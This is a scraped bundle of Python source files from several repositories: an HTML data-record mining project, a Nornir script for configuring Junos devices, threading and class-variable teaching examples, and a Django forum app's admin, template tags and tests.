validate_datasets(SCORES)
validate_metrics(SCORES)
validate_scores_perclass(SCORES)
``` |
{
"source": "jpcbertoldo/pymdr",
"score": 3
} |
#### File: dev/first_sketch/dev_2.py
```python
import lxml
import lxml.html
import lxml.etree
import os
from collections import defaultdict
from graphviz import Digraph
HIERARCHICAL = "hierarchical"
SEQUENTIAL = "sequential"
def open_doc(folder, filename):
folder = os.path.abspath(folder)
filepath = os.path.join(folder, filename)
with open(filepath, "r") as file:
doc = lxml.html.fromstring(
lxml.etree.tostring(lxml.html.parse(file), method="html")
)
return doc
def html_to_dot_sequential_name(html, with_text=False):
graph = Digraph(name="html")
tag_counts = defaultdict(int)
def add_node(html_node):
tag = html_node.tag
tag_sequential = tag_counts[tag]
tag_counts[tag] += 1
node_name = "{}-{}".format(tag, tag_sequential)
graph.node(node_name, node_name)
if len(html_node) > 0:
for child in html_node.iterchildren():
child_name = add_node(child)
graph.edge(node_name, child_name)
else:
child_name = "-".join([node_name, "txt"])
graph.node(child_name, html_node.text)
graph.edge(node_name, child_name)
return node_name
add_node(html)
return graph
def html_to_dot_hierarchical_name(html, with_text=False):
graph = Digraph(name="html")
def add_node(html_node, parent_suffix, brotherhood_index):
tag = html_node.tag
if parent_suffix is None and brotherhood_index is None:
node_suffix = ""
node_name = tag
else:
node_suffix = (
"-".join([parent_suffix, str(brotherhood_index)])
if parent_suffix
else str(brotherhood_index)
)
node_name = "{}-{}".format(tag, node_suffix)
graph.node(node_name, node_name, path=node_suffix)
if len(html_node) > 0:
for child_index, child in enumerate(html_node.iterchildren()):
child_name = add_node(child, node_suffix, child_index)
graph.edge(node_name, child_name)
else:
child_name = "-".join([node_name, "txt"])
child_path = "-".join([node_suffix, "txt"])
graph.node(child_name, html_node.text, path=child_path)
graph.edge(node_name, child_name)
return node_name
add_node(html, None, None)
return graph
def html_to_dot(html, name_option="hierarchical", with_text=False):
if name_option == SEQUENTIAL:
return html_to_dot_sequential_name(html, with_text=with_text)
elif name_option == HIERARCHICAL:
return html_to_dot_hierarchical_name(html, with_text=with_text)
else:
raise Exception("No name option `{}`".format(name_option))
```
#### File: dev/training/preprocess_all.py
```python
import functools
import logging
import multiprocessing
from typing import List
import tqdm
import core
import files_management as fm
import prepostprocessing as ppp
COMP_DIST_MAX_TAG_PER_GNODE = 15
COMP_DISTANCES_MIN_DEPTH = 0
MINIMUM_DEPTH = 3
MAX_TAGS_PER_GNODE = 10
N_PROCESSES = 3
logging.basicConfig(
level=logging.INFO, format="[%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s"
)
logging.info("n available processes: %d", multiprocessing.cpu_count())
class log_and_ignore_fails(object):
def __init__(self, target):
self.target = target
try:
functools.update_wrapper(self, target)
except Exception as ex:
import traceback
print(ex)
traceback.print_stack()
def __call__(self, *args, **kwargs):
try:
self.target(*args, **kwargs)
except Exception as ex:
page_id = args[0].page_id
logging.error("FAIL. page_id=%s ex=%s", page_id, ex)
import traceback
traceback.print_tb(ex.__traceback__)
def download_all_pages(pages_metas):
pages_metas = sorted(pages_metas.values(), key=lambda x: x.page_id)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(ppp.download_raw), pages_metas)
def cleanup_all_pages(pages_metas):
pages_metas = sorted(pages_metas.values(), key=lambda x: x.page_id)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(ppp.cleanup_html), pages_metas)
def compute_all_distances(pages_metas):
pages_metas = sorted(pages_metas.values(), key=lambda x: x.page_id)
precompute_distances = functools.partial(
ppp.precompute_distances,
minimum_depth=COMP_DISTANCES_MIN_DEPTH,
max_tag_per_gnode=COMP_DIST_MAX_TAG_PER_GNODE,
force_override=False,
)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(precompute_distances), pages_metas)
def compute_data_regions(
pages: List[fm.PageMeta],
distance_thresholds: List[float],
minimum_depth: int,
max_tags_per_gnode: int,
):
n_runs = len(pages) * len(distance_thresholds)
logging.info("Number of combinations: {}".format(n_runs))
for th in tqdm.tqdm(distance_thresholds, desc="thresholds"):
run_th = functools.partial(
ppp.precompute_data_regions,
threshold=th,
minimum_depth=minimum_depth,
max_tags_per_gnode=max_tags_per_gnode,
)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(run_th), pages)
def compute_data_records(
pages: List[fm.PageMeta],
distance_thresholds: List[float], # will only consider cases where all dist th are the same
max_tags_per_gnode: int,
):
n_runs = len(pages) * len(distance_thresholds)
logging.info("Number of combinations: {}".format(n_runs))
for th in tqdm.tqdm(distance_thresholds, desc="thresholds"):
run_th = functools.partial(
ppp.precompute_data_records,
thresholds=core.MDREditDistanceThresholds.all_equal(th),
max_tags_per_gnode=max_tags_per_gnode,
)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(run_th), pages)
def main(
exec_download=True, exec_cleanup=True, exec_distances=True, exec_drs=True, exec_drecs=True,
):
# only get the annotated ones
all_labeled_pages = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.n_data_records is not None
}
logging.info("Number of labeled pages: %d.", len(all_labeled_pages))
if exec_download:
download_all_pages(all_labeled_pages)
all_downloaded_pages = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.raw_html.exists()
}
logging.info("Number of downloaded pages: %d.", len(all_downloaded_pages))
if exec_cleanup:
cleanup_all_pages(all_downloaded_pages)
all_cleaned_pages = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.preprocessed_html.exists()
}
logging.info("Number of preprocessed pages: %d.", len(all_cleaned_pages))
if exec_distances:
compute_all_distances(all_cleaned_pages)
pages_with_distance = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.distances_pkl.exists()
}
logging.info("Number of pages with distance: %d.", len(pages_with_distance))
distance_thresholds = [th / 100 for th in range(5, 50 + 1)]
logging.info("Number of threshold: %d.", len(distance_thresholds))
if exec_drs:
compute_data_regions(
list(pages_with_distance.values()),
distance_thresholds,
MINIMUM_DEPTH,
MAX_TAGS_PER_GNODE,
)
pages_with_distance_and_all_th = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.distances_pkl.exists()
and all(page_meta.data_regions_pkl(th, MAX_TAGS_PER_GNODE) for th in distance_thresholds)
}
logging.info(
"Number of pages to computed data records: %d.", len(pages_with_distance_and_all_th)
)
if exec_drecs:
compute_data_records(
list(pages_with_distance_and_all_th.values()), distance_thresholds, MAX_TAGS_PER_GNODE
)
if __name__ == "__main__":
main(
exec_download=False,
exec_cleanup=False,
exec_distances=True,
exec_drs=True,
exec_drecs=True,
)
from files_management import cleanup_pages_meta_lock
cleanup_pages_meta_lock()
```
#### File: pymdr/src/prepostprocessing.py
```python
import datetime
import logging
import urllib
import urllib.request
import urllib.response
from typing import Tuple
import lxml
import lxml.etree
import lxml.html
import retrying
import core
import files_management as fm
logging.basicConfig(
level=logging.INFO,
format="%(levelname)s [%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s",
)
SEC = 1000 # in ms
all_metas = fm.PageMeta.get_all()
def download_raw(page_meta: fm.PageMeta, force_override: bool = False) -> None:
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.raw_html.exists()
if exists:
logging.info(
"Raw page has already been downloaded. page_id=%s", page_meta.page_id,
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("Raw page will be downloaded. page_id=%s", page_meta.page_id)
@retrying.retry(
stop_max_attempt_number=10,
wait_exponential_multiplier=SEC,
wait_exponential_max=10 * SEC,
wrap_exception=True,
)
def call_url():
logging.info("Requesting the page... page_id=%s", page_meta.page_id)
response = urllib.request.urlopen(page_meta.url, timeout=10)
page_binary = response.read()
return page_binary
try:
page = call_url()
except retrying.RetryError:
logging.warning(
"Failed download the page, returning. page_id=%s", page_meta.page_id,
)
return
logging.info("Writing down the file. page_id=%s", page_meta.page_id)
fm.PageMeta.persist_html(page_meta.raw_html, page)
logging.info("Saving download time in metadata file. page_id=%s", page_meta.page_id)
now = datetime.datetime.now()
page_meta.persist_download_datetime(now)
logging.info("Done. page_id=%s", page_meta.page_id)
def cleanup_html(page_meta: fm.PageMeta, force_override: bool = False) -> None:
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.preprocessed_html.exists()
if exists:
logging.info(
"Page has already been preprocessed. page_id=%s", page_meta.page_id,
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("Raw page will be preprocessed. page_id=%s", page_meta.page_id)
logging.info(
"Opening raw html file by removing stuff. page_id=%s", page_meta.page_id,
)
doc = fm.open_html_document(page_meta.raw_html, remove_stuff=True)
logging.info(
"Stripping <meta>, <script>, and <style> tags. page_id=%s", page_meta.page_id,
)
lxml.etree.strip_elements(doc, "script")
lxml.etree.strip_elements(doc, "style")
lxml.etree.strip_elements(doc, "meta")
logging.info("Writing down the file. page_id=%s", page_meta.page_id)
fm.PageMeta.persist_html(page_meta.preprocessed_html, doc)
logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_distances(
page_meta: fm.PageMeta, minimum_depth, max_tag_per_gnode, force_override: bool = False
):
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.distances_pkl.exists()
if exists:
logging.info(
"Distances have already been precomputed, checking parameters... page_id=%s",
page_meta.page_id,
)
precomputed = page_meta.load_precomputed_distances()
precomputed_minimum_depth = precomputed["minimum_depth"]
precomputed_max_tag_per_gnode = precomputed["max_tag_per_gnode"]
precomputed_was_more_restrictive = (
precomputed_max_tag_per_gnode < max_tag_per_gnode
or precomputed_minimum_depth > minimum_depth
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
elif precomputed_was_more_restrictive:
logging.info(
"The previously computed was more restrictive. It'll be overwritten. page_id=%s",
page_meta.page_id,
)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("The distances will be computed. page_id=%s", page_meta.page_id)
node_namer, doc = get_named_nodes_html(page_meta)
logging.info("Computing distances. page_id=%s", page_meta.page_id)
distances = {}
core.compute_distances(doc, distances, {}, node_namer, minimum_depth, max_tag_per_gnode)
logging.info("Persisting distances. page_id=%s", page_meta.page_id)
page_meta.persist_precomputed_distances(distances, minimum_depth, max_tag_per_gnode)
logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_data_regions(
page_meta: fm.PageMeta,
threshold: float,
minimum_depth: int,
max_tags_per_gnode: int,
force_override: bool = False,
):
logging.info("page_id=%s", page_meta.page_id)
assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
exists = page_meta.data_regions_pkl(threshold, max_tags_per_gnode).exists()
if exists:
logging.info(
"The data regions have already been precomputed, checking parameters... page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
if force_override:
logging.info(
"It will be overwritten. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
else:
precomputed = page_meta.load_precomputed_data_regions(threshold, max_tags_per_gnode)
precomputed_minimum_depth = precomputed["minimum_depth"]
if precomputed_minimum_depth > minimum_depth:
logging.info(
"The previously computed was more restrictive. It'll be overwritten. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
else:
logging.info(
"Operation skipped. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
return
else:
logging.info(
"The data regions will be computed. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
node_namer, root = get_named_nodes_html(page_meta)
logging.info(
"Loading precomputed distances. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
# todo (improvement) check for distances max tags per node
distances = page_meta.load_precomputed_distances()
logging.info(
"Starting to compute data regions. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
data_regions = {}
core.find_data_regions(
root, node_namer, minimum_depth, distances, data_regions, threshold, max_tags_per_gnode
)
logging.info(
"Persisting data regions. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
page_meta.persist_precomputed_data_regions(
data_regions, threshold, minimum_depth, max_tags_per_gnode
)
logging.info(
"Done. page_id=%s th=%.2f max_tags=%d", page_meta.page_id, threshold, max_tags_per_gnode
)
def precompute_data_records(
page_meta: fm.PageMeta,
thresholds: core.MDREditDistanceThresholds,
max_tags_per_gnode: int,
force_override: bool = False,
):
logging.info("page_id=%s", page_meta.page_id)
assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
assert page_meta.data_regions_pkl(
thresholds.data_region, max_tags_per_gnode
), "Data regions have NOT been precomputed!"
exists = page_meta.data_records_pkl(thresholds, max_tags_per_gnode).exists()
if exists:
logging.info(
"The data records have already been precomputed. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
if force_override:
logging.info(
"It will be overwritten. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
else:
# todo(improvement) include min depth checking????
logging.info(
"Operation skipped. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
return
else:
logging.info(
"The data records will be computed. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
node_namer, root = get_named_nodes_html(page_meta)
logging.info(
"Loading precomputed data regions. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
# todo (improvement) check for distances max tags per node
distances = page_meta.load_precomputed_distances()
data_regions = page_meta.load_precomputed_data_regions(
thresholds.data_region, max_tags_per_gnode
)
logging.info(
"Starting to compute data records. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
data_records = core.find_data_records(
root, data_regions, distances, node_namer, thresholds, max_tags_per_gnode
)
logging.info(
"Persisting data records. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
page_meta.persist_precomputed_data_records(data_records, thresholds, max_tags_per_gnode)
logging.info(
"Done. page_id=%s th=%s max_tags=%d", page_meta.page_id, thresholds, max_tags_per_gnode
)
def get_named_nodes_html(page_meta: fm.PageMeta) -> Tuple[core.NodeNamer, lxml.html.HtmlElement]:
if page_meta.named_nodes_html.exists():
logging.info(
"Loading the named nodes html. page_id=%s", page_meta.page_id,
)
root = page_meta.get_named_nodes_html_tree()
logging.info("Loading node namer. page_id=%s", page_meta.page_id)
node_namer = core.NodeNamer(for_loaded_file=True)
else:
logging.info(
"Named nodes have NOT been saved, computing it. page_id=%s", page_meta.page_id,
)
assert page_meta.preprocessed_html.exists()
logging.info("Opening preprocessed html. page_id=%s", page_meta.page_id)
root = page_meta.get_preprocessed_html_tree()
logging.info("Loading node namer. page_id=%s", page_meta.page_id)
node_namer = core.NodeNamer()
node_namer.load(root)
logging.info(
"Saving named nodes html. page_id=%s", page_meta.page_id,
)
fm.PageMeta.persist_html(page_meta.named_nodes_html, root)
return node_namer, root
def color_html(page_meta: fm.PageMeta, mdr: core.MDR) -> None:
pass
```
#### File: pymdr/src/utils.py
```python
import os
import pathlib
import pprint
import random
from collections import defaultdict
from typing import List, Optional, Dict
import lxml
import lxml.etree
import lxml.html
import graphviz
import yaml
DOT_NAMING_OPTION_HIERARCHICAL = "hierarchical"
DOT_NAMING_OPTION_SEQUENTIAL = "sequential"
def generate_random_colors(n: int) -> List[str]:
"""
Returns:
list of size `n` with colors in format RGB in HEX: `1A2B3C`
"""
ret = []
r = int(random.random() * 256)
g = int(random.random() * 256)
b = int(random.random() * 256)
step = 256 / n
for i in range(n):
r += (0.85 + 0.30 * random.random()) * step + int(random.random() * 256 * 0.2)
g += (0.85 + 0.30 * random.random()) * step + int(random.random() * 256 * 0.2)
b += (0.85 + 0.30 * random.random()) * step + int(random.random() * 256 * 0.2)
r = int(r) % 256
g = int(g) % 256
b = int(b) % 256
ret.append("{:0>2X}{:0>2X}{:0>2X}".format(r, g, b))
return ret
def html_to_dot_sequential_name(
root: lxml.html.HtmlElement, graph_name: str, with_text: bool = False
) -> graphviz.Digraph:
"""
The names of the nodes are defined by `{tag}-{seq - 1}`, where:
tag: the html tag of the node
seq: the sequential order of that tag
ex: if it is the 2nd `table` to be found in the process, it's name will be `table-00001`
ex:
<html>
<div/>
<div>
<div> <span/> <span/> </div>
</div>
</html>
becomes:
html-0 -> div-0
-> div-1 -> div-2 -> span-0
-> span-1
"""
graph = graphviz.Digraph(name=graph_name)
tag_counts = defaultdict(int)
def add_node(html_node: lxml.html.HtmlElement):
tag = html_node.tag
tag_sequential = tag_counts[tag]
tag_counts[tag] += 1
node_name = "{}-{}".format(tag, tag_sequential)
graph.node(node_name, node_name)
if len(html_node) > 0:
for child in html_node.iterchildren():
child_name = add_node(child)
graph.edge(node_name, child_name)
elif with_text:
child_name = "-".join([node_name, "txt"])
graph.node(child_name, html_node.text)
graph.edge(node_name, child_name)
return node_name
add_node(root)
return graph
def html_to_dot_hierarchical_name(
root: lxml.html.HtmlElement, graph_name: str, with_text=False
) -> graphviz.Digraph:
"""
The names of the nodes are defined by `{tag}-{index-path-to-node}`, where:
tag: the html tag of the node
index-path-to-node: the sequential order of indices that should be called from the root to arrive at the node
ex:
<html>
<div/>
<div>
<div> <span/> <span/> </div>
</div>
</html>
becomes:
html-0 -> div-0-0
-> div-0-1 -> div-0-1-0 -> span-0-1-0-0
-> span-0-1-0-1
Args:
root:
graph_name: parameter passed to the graphviz method
with_text: if True, the pure text in the deepest node is also included in the graph as an extra node.
"""
graph = graphviz.Digraph(name=graph_name)
def add_node(
node: lxml.html.HtmlElement, parent_suffix: Optional[str], brotherhood_index: Optional[int],
):
"""Recursive call on this function. Depth-first search through the entire tree."""
tag = node.tag
if parent_suffix is None and brotherhood_index is None:
node_suffix = ""
node_name = tag
else:
node_suffix = (
"-".join([parent_suffix, str(brotherhood_index)])
if parent_suffix
else str(brotherhood_index)
)
node_name = "{}-{}".format(tag, node_suffix)
graph.node(node_name, node_name, path=node_suffix)
if len(node) > 0:
for child_index, child in enumerate(node.iterchildren()):
child_name = add_node(child, node_suffix, child_index)
graph.edge(node_name, child_name)
elif with_text:
child_name = "-".join([node_name, "txt"])
child_path = "-".join([node_suffix, "txt"])
graph.node(child_name, node.text, path=child_path)
graph.edge(node_name, child_name)
return node_name
add_node(root, None, None)
return graph
def html_to_dot(
root, graph_name="html-graph", name_option=DOT_NAMING_OPTION_HIERARCHICAL, with_text=False,
) -> graphviz.Digraph:
"""
Args:
root:
graph_name:
name_option: hierarchical or sequential naming strategy
with_text: include tags without children as a node with the text content of the tag
Returns:
directed graph representation of an html
"""
if name_option == DOT_NAMING_OPTION_SEQUENTIAL:
return html_to_dot_sequential_name(root, graph_name=graph_name, with_text=with_text)
elif name_option == DOT_NAMING_OPTION_HIERARCHICAL:
return html_to_dot_hierarchical_name(root, graph_name=graph_name, with_text=with_text)
else:
raise Exception("No name option `{}`".format(name_option))
class FormatPrinter(pprint.PrettyPrinter):
"""A custom pretty printer specifier for debug purposes."""
def __init__(self, formats: Dict[type, str]):
super(FormatPrinter, self).__init__()
self.formats = formats
def format(self, obj, ctx, max_lvl, lvl):
obj_type = type(obj)
if obj_type in self.formats:
type_format = self.formats[obj_type]
return "{{0:{}}}".format(type_format).format(obj), 1, 0
return pprint.PrettyPrinter.format(self, obj, ctx, max_lvl, lvl)
project_path = pathlib.Path(os.path.realpath(__file__)).parent.parent.absolute()
def get_config_dict() -> dict:
config = project_path.joinpath("config.yml").absolute()
with config.open("r") as f:
config_dict = yaml.load(f, Loader=yaml.FullLoader)
return config_dict
def get_config_outputs_parent_dir() -> pathlib.Path:
config_dict = get_config_dict()
outputs_parent_dir_path = pathlib.Path(config_dict["outputs-parent-dir"])
if outputs_parent_dir_path.is_absolute():
return outputs_parent_dir_path
return project_path.joinpath(outputs_parent_dir_path).absolute()
```
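A quick usage sketch of `html_to_dot` (the markup and the import path are illustrative; it assumes running from the project root, as the test module below does):
```python
# Illustrative usage of html_to_dot; the HTML fragment is made up.
import lxml.html

import src.utils as utils

root = lxml.html.fromstring("<div><span>a</span><span>b</span></div>")
graph = utils.html_to_dot(root, graph_name="example", with_text=True)
print(graph.source)  # DOT text: div -> span nodes -> txt leaves
# graph.render("example", format="png")  # requires the graphviz binaries on PATH
```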
#### File: pymdr/test/test_utils.py
```python
import unittest
from unittest import TestCase
import src.utils as utils
class TestUtils(unittest.TestCase):
def test_generate_random_colors(self):
colors = utils.generate_random_colors(3)
        self.assertEqual(len(colors), 3)
self.assertTrue(all(c1 != c2 for c1, c2 in zip(colors[:-1], colors[1:])))
def test_html_to_dot_hierarchical_name(self):
self.fail()
def test_html_to_dot(self):
self.fail()
class Test(TestCase):
def test_html_to_dot_sequential_name(self):
self.fail()
``` |
{
"source": "jpcerezo/junos_automation_with_nornir",
"score": 2
} |
#### File: jpcerezo/junos_automation_with_nornir/configure_the_network.py
```python
from nornir import InitNornir
from nornir.plugins.tasks import networking, text
from nornir.plugins.functions.text import print_title, print_result
from nornir.core.filter import F
def configuration(task):
r = task.run(task=text.template_file, name="Generate configuration", template="config.j2", path=f"templates/{task.host.platform}")
task.host["config"] = r.result
task.run(task=networking.napalm_configure, name="Loading configuration on the device", replace=False, configuration=task.host["config"])
nr = InitNornir(config_file="config.yaml", dry_run=False)
Junos_devices = nr.filter(F(platform="junos"))
print_title("Playbook to configure the network")
result = Junos_devices.run(task=configuration)
print_result(result)
'''
# to check if a task failed:
result.failed
'''
'''
# to check if the device vMX1 configuration changed
result["vMX1"].changed
result["vMX1"][2]
result["vMX1"][2].changed
result["vMX1"][2].diff
'''
'''
# the check which devices had a configuration changed
for item in Junos_devices.inventory.hosts:
dev=nr.inventory.hosts[item]
print ('**** ' + item + ' ****')
result[item][2].changed
'''
``` |
{
"source": "jpch89/advanced-python",
"score": 4
} |
#### File: advanced-python/chapter04/class_var.py
```python
class A:
aa = 1
def __init__(self, x, y):
self.x = x
self.y = y
a = A(2, 3)
A.aa = 11
a.aa = 100  # creates a new attribute aa on the instance
print(a.x, a.y, a.aa)
print(A.aa)
"""
2 3 100
11
"""
print()
b = A(3, 5)
print(b.aa)  # the class variable is shared by all instances
"""
11
"""
```
#### File: advanced-python/chapter11/python_thread.py
```python
import time
import threading
# 1. Create threads by instantiating the Thread class
"""
def get_detail_html(url):
print('get detail html started')
time.sleep(2)
print('get detail html end')
def get_detail_url(url):
print('get detail url started')
time.sleep(4)
print('get detail url end')
if __name__ == '__main__':
thread1 = threading.Thread(target=get_detail_html, args=('', ))
thread2 = threading.Thread(target=get_detail_url, args=('', ))
thread2.setDaemon(True)
start_time = time.time()
thread1.start()
thread2.start()
print('time elapsed: {}'.format(time.time() - start_time))
"""
"""
get detail html started
get detail url started
time elapsed: 0.0
get detail html end
"""
# 2. Implement multithreading by subclassing Thread
# and overriding the run method
class GetDetailHTML(threading.Thread):
def __init__(self, name):
super().__init__(name=name)
    def run(self):  # this body is what would otherwise be passed as target
print('get detail url started')
time.sleep(2)
print('get detail url end')
class GetDetailURL(threading.Thread):
def __init__(self, name):
super().__init__(name=name)
    def run(self):  # this body is what would otherwise be passed as target
print('get detail url started')
time.sleep(4)
print('get detail url end')
if __name__ == '__main__':
thread1 = GetDetailHTML('get_detail_html')
thread2 = GetDetailURL('get_detail_url')
start_time = time.time()
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print('time elapsed: {}'.format(time.time() - start_time))
"""
get detail url started
get detail url started
get detail url end
get detail url end
time elapsed: 4.001728534698486
"""
``` |
{
"source": "jpch89/bbs_python37",
"score": 2
} |
#### File: my_bbs/post/admin.py
```python
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from post.models import Comment, Topic
@admin.register(Topic)
class TopicAdmin(admin.ModelAdmin):
class TitleFilter(admin.SimpleListFilter):
title = _('标题过滤')
parameter_name = 'tf'
def lookups(self, request, model_admin):
return (
('first', _('包含first')),
('!first', _('不包含first')),
)
def queryset(self, request, queryset):
if self.value() == 'first':
return queryset.filter(title__contains=self.value())
elif self.value() == '!first':
return queryset.exclude(title__contains=self.value()[1:])
else:
return queryset
def get_ordering(self, request):
if request.user.is_superuser:
return ['id']
else:
return self.ordering
"""
def get_queryset(self, request):
return self.model._default_manager.filter(title__contains='third')
"""
# list_display = ('title', 'content', 'is_online', 'user', 'created_time')
# search_fields = ['title', 'user__username']
search_fields = ['title', '=user__username']
list_display = ('title', 'topic_content', 'topic_is_online', 'user')
# list_filter = ['title', 'user__username']
list_filter = [TitleFilter, 'user__username']
ordering = ['id']
list_per_page = 1
list_max_show_all = 2
# fields = ['user', 'title', 'is_online']
# exclude = ['content']
"""
fields = [
('user', 'title'),
'content',
'is_online'
]
"""
"""
fieldsets = (
('Topic Part A', {
'fields': ('title', 'user'),
'description': 'Topic的title和user',
}),
('Topic Part B', {
'fields': ('content', 'is_online'),
'classes': ['collapse', 'wide'],
'description': 'Topic的content的is_online'
})
)
"""
"""
fields = [('user', 'title'), 'is_online', 'content_length']
readonly_fields = ('user', 'content', 'content_length')
"""
# raw_id_fields = ('user', )
def content_length(self, obj):
return len(obj.content)
content_length.short_description = u'话题长度内容'
def topic_is_online(self, obj):
return u'是' if obj.is_online else u'否'
topic_is_online.short_description = u'话题是否在线'
def topic_content(self, obj):
return obj.content[:30]
topic_content.short_description = u'话题内容'
actions = ['topic_online', 'topic_offline']
def topic_online(self, request, queryset):
rows_updated = queryset.update(is_online=True)
self.message_user(request, '%s topics online' % rows_updated)
topic_online.short_description = u'上线所选的 %s' % Topic._meta.verbose_name
def topic_offline(self, request, queryset):
        rows_updated = queryset.update(is_online=False)
self.message_user(request, '%s topics offline' % rows_updated)
topic_offline.short_description = u'下线所选的 %s' % Topic._meta.verbose_name
def save_model(self, request, obj, form, change):
if change and 'is_online' in form.changed_data and not obj.is_online:
self.message_user(request, 'Topic(%s)被管理员删除了' % obj.id)
obj.title = '%s(%s)' % (obj.title, '管理员删除')
super(TopicAdmin, self).save_model(request, obj, form, change)
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
pass
```
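For context, a hypothetical sketch of the `Topic`/`Comment` models this admin assumes, inferred only from the fields referenced above (`title`, `content`, `is_online`, `user`, `created_time`); the repository's actual `post/models.py` is not shown here and may differ:
```python
# Hypothetical sketch of post/models.py, inferred from the admin code above.
from django.contrib.auth.models import User
from django.db import models


class Topic(models.Model):
    title = models.CharField(max_length=255)
    content = models.TextField()
    is_online = models.BooleanField(default=True)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    created_time = models.DateTimeField(auto_now_add=True)


class Comment(models.Model):
    topic = models.ForeignKey(Topic, on_delete=models.CASCADE)
    content = models.TextField()
```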
#### File: post/templatetags/custom_tags.py
```python
from django import template
register = template.Library()
@register.simple_tag
def prefix_tag(cur_str):
return 'Hello %s' % cur_str
@register.simple_tag(takes_context=True)
def prefix_tag(context, cur_str):
return '%s %s' % (context['prefix'], cur_str)
@register.simple_tag(takes_context=True, name='prefix')
def prefix_tag(context, cur_str):
return '%s %s' % (context['prefix'], cur_str)
@register.inclusion_tag('post/inclusion.html', takes_context=True)
def hello_inclusion_tag(context, cur_str):
return {'hello': '%s %s' % (context['prefix'], cur_str)}
@register.simple_tag
def hello_assignment_tag(cur_str):
return 'Hello: %s' % cur_str
@register.filter
def replace_django(value):
return value.replace('django', 'Django')
@register.filter(name='r_django')
def replace_django(value, base):
return value.replace('django', base)
```
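A short usage sketch of these tags and filters, as it might be run from a `manage.py shell` session of a project that has this app installed (the template string and context values are made up):
```python
# Illustrative only: assumes Django settings are configured and the app providing
# `custom_tags` is in INSTALLED_APPS.
from django.template import Context, Template

t = Template(
    "{% load custom_tags %}"
    "{% prefix 'world' %} | {{ 'hello django'|r_django:'Django Framework' }}"
)
print(t.render(Context({'prefix': 'Greetings'})))
# Greetings world | hello Django Framework
```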
#### File: my_bbs/post/tests.py
```python
import unittest
from django.contrib.auth.models import User
from django.test import TestCase
from post.models import Topic
"""
class SimpleTest(TestCase):
def test_addition(self):
def addition(x, y):
return x + y
self.assertEqual(addition(1, 1), 2)
def test_post_topic_model(self):
user = User.objects.create_user(username='username', password='password')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=user
)
self.assertTrue(topic is not None)
self.assertEqual(Topic.objects.count(), 1)
topic.delete()
self.assertEqual(Topic.objects.count(), 0)
def test_topic_detail_view(self):
user = User.objects.create_user(username='username', password='password')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=user
)
response = self.client.get('/post/topic/%d/' % topic.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['id'], topic.id)
"""
"""
class SimpleTest(TestCase):
@classmethod
def setUpClass(cls):
print('running setUpClass')
@classmethod
def tearDownClass(cls):
print('running tearDownClass')
    # Note (团子): this is not the usual Python naming style; setUp would otherwise be written set_up
def setUp(self):
print('running setUp')
self.user = User.objects.create_user(username='username', password='password')
def test_post_topic_model(self):
print('running test_post_topic_model')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=self.user
)
self.assertTrue(topic is not None)
self.assertEqual(Topic.objects.count(), 1)
topic.delete()
self.assertEqual(Topic.objects.count(), 0)
def test_topic_detail_view(self):
print('running test_topic_detail_view')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=self.user
)
response = self.client.get('/post/topic/%d/' % topic.id)
